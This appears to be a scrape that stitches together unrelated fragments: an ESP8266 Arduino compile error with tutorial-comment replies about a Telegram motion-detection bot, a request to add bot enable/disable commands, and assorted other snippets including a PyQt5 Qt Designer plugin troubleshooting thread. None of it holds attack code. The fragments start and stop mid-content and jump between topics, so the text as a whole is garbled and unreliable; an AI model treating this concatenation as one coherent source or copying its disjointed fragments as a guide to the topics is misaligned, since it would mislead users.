esp_delay(timeout_ms, { return _dns_lookup_pending; }, 1); | ^~~~~~~~~ C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiScan.cpp: In member function ‘int8_t ESP8266WiFiScanClass::scanNetworks(bool, bool, uint8, uint8*)’: C:\Users\giasc\Documents\Arduino\libraries\ESP8266WiFi\src\ESP8266WiFiScan.cpp:100:9: error: ‘esp_suspend’ was not declared in this scope 100 | esp_suspend( { return !ESP8266WiFiScanClass::_scanComplete && ESP8266WiFiScanClass::_scanStarted; }); | ^~~~~~~~~~~ exit status 1 Errore durante la compilazione per la scheda LOLIN(WEMOS) D1 R2 & mini. Hi. check your ESP8266 boards version. You may need to downgrade in Tools > Boards > Boards Manager > ESP8266. Regards, Sara Dear Sara Santos, Is it possible to “enable and disable” the “bot and the motion detection” via sending telegram massages? Can anyone revise the code and help me (I am not able to do it) Best Regards, Kemal
https://randomnerdtutorials.com/telegram-esp8266-nodemcu-motion-detection-arduino/?replytocom=727636
CC-MAIN-2022-27
refinedweb
3,548
66.84
Choosing the Right View for Snapshot Data After a profiling session is over, dotTrace creates a performance snapshot. You can further work with this snapshot, investigating and analyzing application performance problems. Let's take a look at using various analysis views provided by dotTrace to diagnose these problems: Depending on your knowledge of the profiled application and your needs, you can lean towards one view or another. Overview This view helps find out details of the profiling process and some general information about a snapshot. In addition, it lets you look through the list of annotated or adjusted functions. Threads Tree and Call Tree You can start investigation with the Threads Tree view to see the full picture and understand which functions in which threads are executed and how many threads are spawned by your application. Another way is to start with the Call Tree view. In both views, you navigate from the first to the last function call just like your application does. The difference is that in Threads Tree function calls are considered within threads, and in Call Tree within the whole application process excluding the division into threads. All metrics are calculated accordingly. Back Traces This view is available only if a function is opened in a new tab. It helps you trace the call chain that led to this particular function. If the function is called from different call sites, there will be several call chains. Plain List This is the view that helps you not only review snapshot data, but also rearrange it in different ways. By default, you get a list of all functions sorted by total execution time. Using this view you can study how much time is spent in the function itself, how many times the current function is called. Functions can also be sorted by any of four metrics and by function name as well. It helps you find a function with the highest own time or a function with the greatest number of calls. Moreover, calls can optionally be grouped by Class or Namespace, enabling you to investigate problem classes and even namespaces. Hot Spots If you want to focus on the most time-consuming functions, it's better to use the Hot Spots view. It represents a list of callback trees for each of 100 functions with the highest own time. Source View After a performance issue is located, it's useful to view the source code and find out why a particular function is slow.
http://www.jetbrains.com/help/profiler/Studying_Profiling_Results__Different_Ways_of_Presenting_Snapshot_Data.html
CC-MAIN-2017-26
refinedweb
417
60.85
Introduction is restricted only to localhost but this can be circumvented by using ssh tunnel. nmap scan nmap -sC -sV -oN servmon -vvv 10.10.10.184 In summary these are the ports: PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 127 Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_01-18-20 12:05PM Users | ftp-syst: |_ SYST: Windows_NT 22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_7.7 (protocol 2.0) 80/tcp open http syn-ack ttl 127 5666/tcp open tcpwrapped syn-ack ttl 127 6699/tcp open napster? syn-ack ttl 127 8443/tcp open ssl/https-alt syn-ack ttl 127 Host script results: |_clock-skew: 2m30s | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 40676/tcp): CLEAN (Couldn't connect) | Check 2 (port 20065/tcp): CLEAN (Couldn't connect) | Check 3 (port 54993/udp): CLEAN (Failed to receive data) | Check 4 (port 62863/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-04-15T04:42:56 |_ start_date: N/A I have tested the 139 and 445 and did web fuzzing on, i cannot find entry point for smb vulnerability, web fuzzing also did not enumerate any useful directory: ----------------- DIRB v2.22 By The Dark Raver ----------------- OUTPUT_FILE: dirb_result START_TIME: Thu Apr 16 11:10:01 2020 URL_BASE: WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: ---- + (CODE:200|SIZE:1150) + (CODE:200|SIZE:340) ----------------- END_TIME: Thu Apr 16 11:38:15 2020 DOWNLOADED: 4612 - FOUND: 2 NVMS-1000 web portal Searching the web with duckduckgo I have found that there is a path traversal vulnerability. On searchsploit this exploit can be found: Read the exploit doc you will see a poc: POC: curl http://[IP Address]/../../../mnt/mtd/config/config.dat 2>/dev/null | strings I tested this with msfconsole and files can be downloaded. nsclient++ configuration file can be downloaded from this path /program+files/nsclient%2B%2B/nsclient.ini you need to understand the filepath is an uri hence the “/” and space has to be encoded in url. In the nsclient.ini a plaintext password of nsclient is found, this is used when rooting the machine, so first of all we need to find the user flag first. User’s flag hint FTP to 10.10.10.184, this ftp server allows anonymous login. Then enumerate the directory once connection established. Download the files in respective directories to find out what are they. Looking at Confidential.txt, I found out where to look for passwords. Read the Notes to do.txt, I understood that nsclient cannot be access remotely, this coincides with the nsclient.ini, which only allows 127.0.0.1. Looking at nsclient.ini Download password.txt I will be using the same path traversal exploit of nvms-1000 to help me download the password.txt file. I could use the same exploit in msfconsole to do it, but i have decided to write my python script to help me download the file. import requests # You will need to encode the ../ to url in order for the web to understand it 😉 # I have fuzzed it until it spits out the nsclient.ini hahaha trasversal = "..%2F" web = "http" port = 80 outfile = "passwords.txt" # on msfconsole use the auxiliary/scanner/http/tvt_nvms_traversal # set filepath to /Users/Nathan/Desktop/Passwords.txt filepath = "Users%2FNathan%2FDesktop%2FPasswords.txt" uri = f"{web}://10.10.10.184/{trasversal * 3}{filepath}" print(uri) response = requests.get(uri, verify=False) if response.status_code == 200: with open(f"/root/htb/servmon/{outfile}", "w") as file: file.write(response.text) There are several passwords I tested each password for both nathan and nadine with ssh and finally I got connected to nadine with this password: L1k3B1gBut7s@W0rk Get user’s flag ssh nadine@10.10.10.184 with the password found. Privilege escalation As only 127.0.0.1 is allowed to access nsclient++ web portal, I need ssh tunnel to bypass this restriction. Also the webportal may not displayed properly in firefox, I recommend you use chromium which is much better. ssh -L 8080:127.0.0.1:8443 nadine@10.10.10.184 This is the command line to set up ssh tunnel, what this means is that you are setting up a ssh proxy which is listened by your attacking machine which is 127.0.0.1:8080, the traffic is sent over to 10.10.10.184 which in turn sends back to the localhost of the remote machine at port 8443. This is how I use chromium --no-sandbox to open the nsclient web ui and login with the password discovered from nsclient.ini. this is the nsclient password discovered ew2x6SsGTxjRwXOT There is a vulnerability with nsclient which you can use searchsploit nsclient You can read the instruction, the pre-requisites are to enable CheckExternalScripts and Scheduler, you can check this in the web ui to ensure these two modules are enabled. I have tried to add my own scripts in the web ui but i got problem configuring them so I turned to use nsclient api, use the add script api. I tried to upload the nc.exe but it was deleted I suspect it was quarantined by the Windows Defender, and also I tried to upload a reverse shell powershell script it was also deleted. But there is a solution I use msfvenom and created a batch file that triggers a powershell script within the batch file. msfvenom -p cmd/windows/reverse_powershell lhost=10.10.14.20 lport=4444 -o evilps.bat Use this curl command to upload the batch from my attacking machine to servmon. curl -s -k -u admin -X PUT --data-binary @evilps.bat notice the address is which is through the ssh tunnel. Set up the multi handler in msfconsole with the same payload i used for msfvenom. Then run the command in nsclient web ui console.
https://cyruslab.net/2020/04/17/hacktheboxservmon/
CC-MAIN-2022-27
refinedweb
1,017
65.93
can't import java to javaFX Hi! can't import my java file in javaFX . they are same package. ------- java ------- package x ; class MyJava{} ---------- javaFX ---------- package x ; import x.MyJava ; <---- an Error occurred : cannot find symbol !! In netbean6.0.1's plugin did not ! but, In netbean6.1(fx plugin version 2008-04-18_14-52-03) an error occurred please, help!! dude from the source i can read that both files are in the same package so u dont need to import anything :D anyway if u still have probs post the full source and the error message. i know that don't need to import in same package. first, i tried that! but an Error occurred. so, i tried that method. if it's only my problem in netbean6.1, i'll try again !!. thank you. I tried the example with plugin 2008-06-15_02-32-47.zip and it works for me. Probably something has been fixed in the JavaFX Script compiler. thank you for replying! I found that netbean6.1's Preview window not work rightly ! an Error occurred in Preview window , but compiling worked well! and program worked well too! until now, Preview window display Error message! Message was edited by: expsan hi, i have the same problem, i cant import java classes into my fx-classes. > as Hello; this error occurs: undefined type javaClass.Hello in import < my Java-Class is seems like that package javaClass; public class Hello{ //code } my fx-class: package javaClass; import javaClass.Hello; //code can anybody tell me the reason why it dosent work?
https://www.java.net/node/679526
CC-MAIN-2014-15
refinedweb
264
79.87
Microsoft announced full support for NUnit and other Testing frameworks in Visual Studio 11. However today you still don’t have NUnit integration out-of-the-box. Of course you can use the Resharper plugin or TestDriven.NET but these are not free(although worth every cent). Last week I discovered Visual Nunit, a free alternative to run your NUnit tests inside Visual Studio. Visual Nunit is an open source NUnit runner for Visual Studio 2010. It provides convenient view to test cases and enables debugging (red arrow) tests easily inside development environment. It does not require separate test project. Implemented as Visual Studio Integration Package. Features: - Easy test debugging - Easy and fast NUnit test execution - NET 2.0, 3.0, 3.5 and 4.0 support - Test execution progress, time and summary - Stack trace view - Test filtering based on project, namespace and fixture
http://bartwullems.blogspot.com/2011/11/visual-studio-2010-nunit-support.html
CC-MAIN-2017-26
refinedweb
144
60.11
making a Qt Designer plugin with python -- plugins not visible in Designer I am trying to create a custom widget plugin for Qt Desinger using PyQt5. I am using python 3.7, PyQt5 (5.13.0), PyQt5-sip (4.19.18) macos 10.14.5 Qt Designer (5.13) from QtCreator installed for mac (free version). before making my plugin, I simply want to setup the designer sample plugins so make sure i understand the process. To test, I downloaded analogclock.py and analogclockplugin.py from I modified the plugins.py app like this: import sys from PyQt5.QtCore import QLibraryInfo, QProcess, QProcessEnvironment # Tell Qt Designer where it can find the directory containing the plugins and # Python where it can find the widgets. env = QProcessEnvironment.systemEnvironment() env.insert('PYQTDESIGNERPATH', '[path to the plugin.py files]/designer_plugins') env.insert('PYTHONPATH', '[path to the widgets]/designer_widgets') # Start Designer. designer = QProcess() designer.setProcessEnvironment(env) designer_bin = QLibraryInfo.location(QLibraryInfo.BinariesPath) if sys.platform == 'darwin': designer_bin = '/Users/[user]/Qt/5.13.0/clang_64/bin/Designer.app/Contents/MacOS/Designer' else: designer_bin += '/designer' designer.start(designer_bin) designer.waitForFinished(-1) When I run plugins.py, designer opens as expected, but i do not see the plugins at all. I've read that pyqt5.dylib is necessary, but it doesn't exist on my computer anywhere. So, - is this the cause? - if yes, where can I get it or how can I make it? - once I have it, where do I put it? I am familiar with Qt Designer and PyQt, but not an expert. Please explain like you're talking to a pretty clueless person. thanks. EDIT: I have installed SIP and PyQt5 from the source. This added the libpyqt5.dylib file to Qt/5.13.0/clang_64/plugins/designer/ but, I got this error: ERROR:root:PyCapsule_GetPointer called with incorrect name EDIT2: the only way I could get rid of that error was to uninstall PyQt5-sip and reinstall it via pip. (same version though, 4.19.18). But, still no plugins. When I check 'about plugins' in the designer menu, I do see this: I assume that if things were correct, the analogclock widget would be seen there as well as in the left-side area of the main window where all the widgets are. EDIT 3: after setting QT_DEBUG_PLUGINS to 1, I can see this in the terminal output: Found metadata in lib /Users/.../Qt/5.13.0/clang_64/plugins/designer/libpyqt5.dylib, metadata= { "IID": "org.qt-project.Qt.QDesignerCustomWidgetCollectionInterface", "archreq": 0, "className": "PyCustomWidgets", "debug": false, "version": 331008 } loaded library "/Users/.../Qt/5.13.0/clang_64/plugins/designer/libpyqt5.dylib" This seems good and explains (I think) why I can see libpyqt5.dylib in the screenshot above. But does not explain why the widgets themselves are missing. Any ideas? How can I do more debugging? EDIT4: Now I notice that near the end of the debugger it says: ModuleNotFoundError: No module named 'PyQt5' this disappears when i don't set the environment variables (i.e., if I run designer from the terminal without user$ export PYQTDESIGNERPATH='the path') anyone out there in Qt land?? @anp405, my first guess would be that by setting PYTHONPATH you are losing the location of PyQt5 package. This depends on your Python and environment setup, but if there is some PYTHONPATH existing, you are overriding it completely instead of complementing. You can verify this by opening a new command line session, setting PYTHONPATH to wherever your code sets it, then running Python interpreter and trying to import PyQt5. Another guess would be that your child process uses different Python environment (e.g. built-in system Python 2), which does not have PyQt5 installed in its site-packages.
https://forum.qt.io/topic/106284/making-a-qt-designer-plugin-with-python-plugins-not-visible-in-designer/2
CC-MAIN-2019-39
refinedweb
618
52.46
Red Hat Bugzilla – Bug 222522 Review Request: aqbanking - A library for online banking functions and financial data import/export Last modified: 2014-03-16 23:04:57 EDT Spec URL: SRPM URL: Description: aqbanking, assorted frontends, backend, bindings, etc. aqbanking is the online banking library used by gnucash (and, potentially, kmymoney and grisbi). A change from the Fedora Core package is that we build all the backends and frontends. Created attachment 145526 [details] build failure log Not a full review, just an early bird's picks: * %defattr missing in several sub-packages * Obsoletes ought to specify max.versions (using "LT", or "LE" inequations) * main package must not own %{_libdir}/gwenhywfar since that belongs into the "gwenhywfar" pkg already * Excludes are not symmetric. That's dangerous since you can lose files: main package: %exclude %{_libdir}/aqbanking/plugins/*/debugger %exclude %{_libdir}/aqbanking/plugins/*/frontends/* %exclude %{_libdir}/aqbanking/plugins/*/wizards qbanking package: %{_libdir}/aqbanking/plugins/*/debugger %{_libdir}/aqbanking/plugins/*/frontends/qbanking %{_libdir}/aqbanking/plugins/*/wizards You exclude everything in %{_libdir}/aqbanking/plugins/*/frontends/* but only %{_libdir}/aqbanking/plugins/*/frontends/qbanking is included explicitly. Other content below %{_libdir}/aqbanking/plugins/*/frontends/ would be skipped/excluded silently. * * [ "$RPM_BUILD_ROOT" != "/" ] && rm -rf $RPM_BUILD_ROOT Useless check. Nowadays buildroot cannot be "/" anymore. * "Requires: pkgconfig" in the frontends' -devel packages is redundant, since they all need aqbanking-devel which in turn requires pkgconfig for all its *-config queries (due to the applied Patch2) Doesn't build in mock (rawhide x86_64), build.log ends with; << DIE_RPATH_DIE="/usr/lib64:$DIE_RPATH_DIE" gcc -O2 -g -pipe -Wall -Wp,-D_FORTIFY_SOURCE=2 -fexceptions -fstack-protector --param=ssp-buffer-size=4 -m64 -mtune=generic -g -Wall -g -o .libs/testlib testlib.o ./.libs/libcbanking.so /usr/bin/ld: warning: libaqbanking.so.16, needed by ./.libs/libcbanking.so, not found (try using -rpath or -rpath-link) testlib.o: In function `main': /builddir/build/BUILD/aqbanking-2.1.0/src/frontends/cbanking/testlib.c:6: undefined reference to `AB_Banking_free' ./.libs/libcbanking.so: undefined reference to `AB_Banking_SetProgressEndFn' ./.libs/libcbanking.so: undefined reference to `AB_Banking_SetHideBoxFn' ./.libs/libcbanking.so: undefined reference to `AB_Banking_new' ./.libs/libcbanking.so: undefined reference to `AB_Banking_SetProgressLogFn' ./.libs/libcbanking.so: undefined reference to `AB_Banking_InputBox' ./.libs/libcbanking.so: undefined reference to `AB_Banking_SetShowBoxFn' ./.libs/libcbanking.so: undefined reference to `AB_Banking_SetMessageBoxFn' ./.libs/libcbanking.so: undefined reference to `AB_Banking_SetGetPinFn' ./.libs/libcbanking.so: undefined reference to `AB_BANKING__INHERIT_GETLIST' ./.libs/libcbanking.so: undefined reference to `AB_BANKING__INHERIT_SETDATA' ./.libs/libcbanking.so: undefined reference to `AB_Banking_SetProgressAdvanceFn' ./.libs/libcbanking.so: undefined reference to `AB_Banking_SetInputBoxFn' ./.libs/libcbanking.so: undefined reference to `AB_Banking_MessageBox' ./.libs/libcbanking.so: undefined reference to `AB_Banking_SetProgressStartFn' collect2: ld returned 1 exit status make[4]: *** [testlib] Error 1 make[4]: Leaving directory `/builddir/build/BUILD/aqbanking-2.1.0/src/frontends/cbanking' make[3]: *** [all-recursive] Error 1 make[3]: Leaving directory `/builddir/build/BUILD/aqbanking-2.1.0/src/frontends' make[2]: *** [all-recursive] Error 1 make[2]: Leaving directory `/builddir/build/BUILD/aqbanking-2.1.0/src' make[1]: *** [all-recursive] Error 1 make[1]: Leaving directory `/builddir/build/BUILD/aqbanking-2.1.0' make: *** [all] Error 2 error: Bad exit status from /var/tmp/rpm-tmp.37465 (%build) >> Other minor issues; Shouldn't Buildrequires on python be python-devel instead? Also the python packaging guildeline mandates defining python_sitelib at the top of your specfile, so the files under -python-%{name} subpackages would just go into %{python_sitelib}/%{name}/ (In reply to comment #1) > * %defattr missing in several sub-packages Gack, fixed. > * Obsoletes ought to specify max.versions (using "LT", or "LE" > inequations) They're obsolete upstream projects that this replaced - is there really a need to specify a version for such things? > * main package must not own %{_libdir}/gwenhywfar since that belongs > into the "gwenhywfar" pkg already Fixed. > You exclude everything in > %{_libdir}/aqbanking/plugins/*/frontends/* > but only > %{_libdir}/aqbanking/plugins/*/frontends/qbanking > is included explicitly. Other content below > %{_libdir}/aqbanking/plugins/*/frontends/ > would be skipped/excluded silently. So, other frontends could eventually add code. If I only exclude the specific frontend, the code will end up wrongly in the main package. If exclude all, as it's currently done, it will end up silently dropped. Fun. I suppose in the wrong package is better than silently missed. > * ??? Why bring automake into the buildroot if the package never calls it? Seems better to have something else own the dir. > * [ "$RPM_BUILD_ROOT" != "/" ] && rm -rf $RPM_BUILD_ROOT > Useless check. Nowadays buildroot cannot be "/" anymore. Fixed. > * "Requires: pkgconfig" in the frontends' -devel packages is redundant, > since they all need aqbanking-devel which in turn requires pkgconfig > for all its *-config queries (due to the applied Patch2) True, but since all the -config scripts *explicitly* call it, I'm more comfortable leaving the Requires: in. (In reply to comment #2) > Doesn't build in mock (rawhide x86_64), build.log ends with; Will poke at it. Yay libtool. > Other minor issues; > Shouldn't Buildrequires on python be python-devel instead? It doesn't link against libpython, so, no. > Also the python packaging guildeline mandates defining python_sitelib at the top > of your specfile, so the files under -python-%{name} subpackages would just go > into %{python_sitelib}/%{name}/ Is this on the wiki somewhere? I'm not finding it. (In reply to comment #4) > > > Also the python packaging guildeline mandates defining python_sitelib at the top > > of your specfile, so the files under -python-%{name} subpackages would just go > > into %{python_sitelib}/%{name}/ > > Is this on the wiki somewhere? I'm not finding it. Ah. That's not actually linked anywhere from the main guidelines page. Perhaps it should be. > ??? Why bring automake into the buildroot if the > package never calls it? Seems better to have something > else own the dir. Wink, wink, Core dudes! ;-) The reviewing guidelines are quite explicit in this case nowadays:. But as I wrote, aqbanking-devel API users likely use automake anyway. *g* > versioned Obsoletes ... make it less of a hassle in case you (or your fellow packagers) ever want to bring back packages with the obsolete names (and that has been a real-world scenario before, not a purely theoretical one). Admittely, it's far from a serious issue for the "aqhbci" namespace. (In reply to comment #7) >. Messy; essentially means any automake-ed devel package will require automake even if no one uses it. Ah well. Fixed. > > versioned Obsoletes > > ... make it less of a hassle in case you (or your fellow packagers) > ever want to bring back packages with the obsolete names (and that > has been a real-world scenario before, not a purely theoretical one). Oh, I know the theory and that it happens; just not sure it will happen in this case. (Of course, if it happens with a new package, in the same namespace, with a lower version, then you get to play with epochs. Yay!) Tweaked for the last version I could find anywhere (1.0.3). New stuff uploaded as -12. The changes you made in the spec here, mkdir -p $RPM_BUILD_ROOT/%{_datadir}/doc/%{name}-%{version} mv $RPM_BUILD_ROOT/%{_datadir}/doc/{aqbanking,aqhbci} $RPM_BUILD_ROOT/%{_datadir}/doc/%{name}-%{version} are thrown out by the %doc macro in the files section. The docs you move there are lost; I suggest you remove the %doc macro from aqbanking file section and manually move {AUTHORS README COPYING ChangeLog} to that directory you created. Also (not sure if this matters),somewhere in the build log there is make[4]: Entering directory `/builddir/build/BUILD/aqbanking-2.1.0/bindings/python' make[4]: Nothing to be done for `install-exec-am'. ./aqcodegen types.xml ../../src/libs/aqbanking/types > _aqtypes.py.tmp && \ mv _aqtypes.py.tmp _aqtypes.py || \ rm -f _aqtypes.py.tmp Traceback (most recent call last): File "./aqcodegen", line 5, in <module> import xml.dom.ext.reader.Sax2 ImportError: No module named ext.reader.Sax2 test -z "/usr/lib/python2.5/site-packages/aqbanking" || mkdir -p -- "/var/tmp/aqbanking-2.1.0-12-root-mockbuild/usr/lib/python2.5/site-packages/aqbanking" Fixing - the latter seems like a missing buildreq (PyXML)... are you still getting a valid python package? Fixes uploaded as -13. You forgot to add the fixed doc directory to the file list. Adding it, and running rpmlint on the resulting packages produce; [deji@agape reviews]$ rpmlint aqbanking-2.1.0-13.src.rpm W: aqbanking unversioned-explicit-obsoletes aqhbci-devel - You forgot to version to this one. [deji@agape reviews]$ rpmlint aqbanking-2.1.0-13.x86_64.rpm E: aqbanking obsolete-not-provided aqhbci - aqbanking needs to also 'Provides: aqhbci' E: aqbanking zero-length /usr/share/aqbanking/bankinfo/us/bic.idx [deji@agape reviews]$ rpmlint aqbanking-devel-2.1.0-13.x86_64.rpm E: aqbanking-devel obsolete-not-provided aqhbci-devel - Also needs to provided for. E: aqbanking-devel zero-length usr/share/doc/aqbanking-devel-2.1.0/01-OVERVIEW - Can be left out of the doc list . W: qbanking no-documentation - I believe this and the rest like it can be ignored. [deji@agape reviews]$ rpmlint qbanking-devel-2.1.0-13.x86_64.rpm W: qbanking-devel no-documentation [deji@agape reviews]$ rpmlint kbanking-2.1.0-13.x86_64.rpm W: kbanking no-documentation [deji@agape reviews]$ rpmlint kbanking-devel-2.1.0-13.x86_64.rpm W: kbanking-devel no-documentation [deji@agape reviews]$ rpmlint python-aqbanking-2.1.0-13.x86_64.rpm W: python-aqbanking no-documentation [deji@agape reviews]$ rpmlint g2banking-devel-2.1.0-13.x86_64.rpm W: g2banking-devel no-documentation [deji@agape reviews]$ rpmlint g2banking-2.1.0-13.x86_64.rpm W: g2banking no-documentation And you really haven't fixed > * [ "$RPM_BUILD_ROOT" != "/" ] && rm -rf $RPM_BUILD_ROOT > Useless check. Nowadays buildroot cannot be "/" anymore. . It's in FE-4. But see above. > And you really haven't fixed > > * [ "$RPM_BUILD_ROOT" != "/" ] && rm -rf $RPM_BUILD_ROOT > > Useless check. Nowadays buildroot cannot be "/" anymore. Fixed %install before, fixed %clean now. Uploaded as -14. (In reply to comment #13) > . > The way I always read Obsolete/Provides is that its meant for people installing the software, not programs using it. Thus if someone doesn't know aqhbci had been obsoleted type 'yum install aqhbci', he'll get aqbanking because of Provides. > > Uploaded as -14. Look like you inadvertently use the %doc macro under aqbanking files section again, that will clean out the directory before packaging it ;). Just listing the directory without the %doc will do. I believe the package is OK after doing that. Re: %doc - I've tested it, the doc build as it's there now seems to work fine for me. I'd be happy to review this package. Here's a review: OK - Package meets naming and packaging guidelines OK - Spec file matches base package name. OK - Spec has consistant macro usage. OK - Meets Packaging Guidelines. See below - License (GPL) OK - License field in spec matches See below - License file included in package OK - Spec in American English OK - Spec is legible. OK - Sources match upstream md5sum: 712b21f0354d4f890a02da4f8763768b aqbanking-2.1.0.tar.gz 712b21f0354d4f890a02da4f8763768b aqbanking-2.1.0 subpackages require base package with fully versioned depend. See below - Should have dist tag See below - Should package latest version 3 outstanding bugs - check for outstanding bugs on package. Issues: 1. Minor: Could include COPYING file? Also, possibly: AUTHORS Changelog NEWS README TODO 2. Possibly a missing BuildRequires: checking for AccountNumberCheck_new in -lktoblzcheck... no checking ktoblzcheck.h usability... no checking ktoblzcheck.h presence... no checking for ktoblzcheck.h... no. 4. rpmlint says: a) E: aqbanking obsolete-not-provided aqhbci E: aqbanking-devel obsolete-not-provided aqhbci-devel E: qbanking obsolete-not-provided aqhbci-qt-tools Suggest: As mentioned earlier in this review, these can probibly be ignored if it's unlikely that these packages will ever come back at a later time.. c) W: g2banking no-documentation W: g2banking-devel no-documentation W: kbanking no-documentation W: kbanking-devel no-documentation W: python-aqbanking no-documentation W: qbanking no-documentation W: qbanking-devel no-documentation Suggest: ignore. 5. Minor: use dist tag? 6. This is an old version... upstream is at 2.2.8. Any reason not to upgrade to that version? 7. 3 outstanding bugs, might look at the multilib conflicts and see if they are solveable at this time? (In reply to comment #16) > Issues: > > 1. Minor: Could include COPYING file? Also, possibly: > AUTHORS Changelog NEWS README TODO Should be in there - see the shenanigans in %install. > 2. Possibly a missing BuildRequires: > > checking for AccountNumberCheck_new in -lktoblzcheck... no > checking ktoblzcheck.h usability... no > checking ktoblzcheck.h presence... no > checking for ktoblzcheck.h... no Not shipped in Core/Extras. If someone wants to maintain it, I can add a buildreq, but I'm not really interested. >. *shrug* We could. It's not like MP3 or something where we remove it so we're not violating any license. > 4. rpmlint says: .. >. Upstream poked. > 5. Minor: use dist tag? It changes ABI, so it's unlikely to be rebased between releases. But it could be added if needed later. > 6. This is an old version... upstream is at 2.2.8. > Any reason not to upgrade to that version? Want to get stack reviewed, then upgrade stack. > 7. 3 outstanding bugs, might look at the multilib conflicts and see if they > are solveable at this time? 205589 and 228321 are both solved in this package with the split into separate packages. 212518 will be solved with an upgrade. 1. Ah, yeah, I see all of those now except for NEWS. Not sure how useful that file is really, so it's a pretty minor item. 2. ok. 3. True, as long as nothing links to that binary library, it shouldn't matter. Can you confirm that the 'yellownet.so*' isn't linking to that binary module? 4. ok, thanks. Note that this might be fixed in an updated version already. 5. ok. 6. ok. Fair enough. 7. Excellent. Sounds good. So, the only outstanding issues are including the NEWS file if you want and to doublecheck and make sure the yellownet.so* files are never linking against the binary only yellow .so thats shipped with the package. I'll go ahead and APPROVE this package now. If you could check the library and address the NEWS file before importing that would be great. Looked at yellownet.so; it does not reference any symbols from that library. NEWS file added in CVS. This is built now. Package Change Request ====================== Package Name: aqbanking New Branches: EL-4 EL-5 CVS done. BTW, there's no need to reopen bugs to make CVS requests; we only query for the flag state.
https://bugzilla.redhat.com/show_bug.cgi?id=222522
CC-MAIN-2017-09
refinedweb
2,408
52.05
. So in my previous posts, I explained how you can use DebugDiag tool to capture high memory dumps with leak tracking enabled and also how to use the inbuilt memory analysis scripts to get a report of memory usage. In this post, I discuss how you can do things manually using Debugging tools for Windows or Windbg. Again, I have tried to provide a generic approach, but with an example. It doesn’t apply to each & every situation. So I have a memory dump which is about 500 MB in size and was captured when web applications started throwing out of memory errors. The first thing to do find out is where most of the memory is. I discussed this a bit in one of my earlier blog posts. 1: 0:000> !address -summary 2: 3: -------------------- Usage SUMMARY -------------------------- 4: TotSize ( KB) Pct(Tots) Pct(Busy) Usage 5: 1806000 ( 24600) : 01.17% 01.19% : RegionUsageIsVAD 6: 14f3000 ( 21452) : 01.02% 00.00% : RegionUsageFree 7: 23e9000 ( 36772) : 01.75% 01.77% : RegionUsageImage 8: 2200000 ( 34816) : 01.66% 01.68% : RegionUsageStack 9: 88000 ( 544) : 00.03% 00.03% : RegionUsageTeb 10: 78c82000 ( 1978888) : 94.36% 95.34% : RegionUsageHeap 11: 0 ( 0) : 00.00% 00.00% : RegionUsagePageHeap 12: 1000 ( 4) : 00.00% 00.00% : RegionUsagePeb 13: 1000 ( 4) : 00.00% 00.00% : RegionUsageProcessParametrs 14: 2000 ( 8) : 00.00% 00.00% : RegionUsageEnvironmentBlock 15: Tot: 7fff0000 (2097088 KB) Busy: 7eafd000 (2075636 KB) 16: 17: Largest free region: Base 57818000 - Size 00068000 (416 KB) So from this output we can see that 94.36% of the entire virtual address space is in RegionUsageHeap, which means heap memory. We can also see the size – 1,978,888 KB or 1.88 GB! Remember I indicated a few moments back that our dump file itself is just 500 MB in size. So what this most likely means is that this value is the reserved memory vs. committed bytes plus other information that the dump file contains. We can also see that the largest contiguous free region is just 416 KB, which explains why this process ran into out of memory errors. There is just no large contiguous free block to satisfy allocation requests. A process will have at least one heap, the default process heap which is created by the operating system for you when the process starts. This heap is used for allocating memory if no other heaps are created and used. Components loaded within the process can create their own heaps. For eg the C Runtime heap. Many of you will remember it as MSVCRT.dll – that’s our C Runtime library. OK, so how many heaps and which heap has the most number of allocations? The trick I usually use is to look at all the heaps and check how many segments each heap has. I think the maximum number of segments a heap can have is 64. Segments are contiguous blocks of memory which hold smaller memory ranges of various sizes. These ranges are of various sizes are handed out to applications when they request memory. Thus, if a segment does not have enough memory to satisfy an allocation request, a new segment is created. The more number of segments, the more the chances are that it is our problem heap. Recommended reading. To view the segments, you can use the inbuilt Windbg extension command !heap From this example: !heap 0 115: 02990000 <------------- Heap Handle Segment at 02990000 to 029d0000 (00030000 bytes committed) Segment at 0bc10000 to 0bd10000 (00037000 bytes committed) Segment at 0e350000 to 0e550000 (00007000 bytes committed) Segment at 15fe0000 to 163e0000 (00002000 bytes committed) Segment at 59530000 to 59d30000 (00001000 bytes committed) . . . Segment at 5e980000 to 5e997000 (00001000 bytes committed) Segment at 60040000 to 60057000 (00001000 bytes committed) Segment at 611e0000 to 611f7000 (00001000 bytes committed) 117: 02a10000 <------------- Heap Handle Segment at 02a10000 to 02a50000 (00040000 bytes committed) Segment at 0fc90000 to 0fd90000 (000b7000 bytes committed) Segment at 17640000 to 17840000 (0000e000 bytes committed) Segment at 21ba0000 to 21fa0000 (00001000 bytes committed) Segment at 58530000 to 58d30000 (00001000 bytes committed) Segment at 5e9c0000 to 5f9c0000 (00001000 bytes committed) . . . Segment at 7fe70000 to 7ff23000 (00001000 bytes committed) Segment at 23de0000 to 23e3a000 (00001000 bytes committed) Segment at 52770000 to 527ca000 (00001000 bytes committed) Segment at 52900000 to 5295b000 (00001000 bytes committed) Segment at 584c0000 to 5851b000 (00001000 bytes committed) Segment at 5a270000 to 5a2cb000 (00001000 bytes committed) I have truncated the above entry for brevity, but essentially there were many segments. An easier way to see how many segments are there in a heap is to use the !heap command again with the –s switch (for statistics) followed by heap handle. Thus: !heap –s 02a10000 Take a look at lines #12 & # 13 in the following output. 1: 0:000> !heap -s 02a10000 2: Walking the heap 02a10000 ....................................................................... 3: 0: Heap 02a10000 4: Flags 00001003 - HEAP_NO_SERIALIZE HEAP_GROWABLE 5: Reserved memory in segments 184708 (k) 6: Commited memory in segments 18014398506966656 (k) 7: Virtual bytes (correction for large UCR) 1252 (k) 8: Free space 254 (k) (45 blocks) 9: External fragmentation 0% (45 free blocks) 10: Virtual address fragmentation 201004% (77 uncommited ranges) 11: Virtual blocks 0 - total 0 KBytes 12: Lock contention 2989 13: Segments 64 14: 896 hash table for the free list 15: Commits 0 16: Decommitts 0 17: 18: Default heap Front heap Unused bytes 19: Range 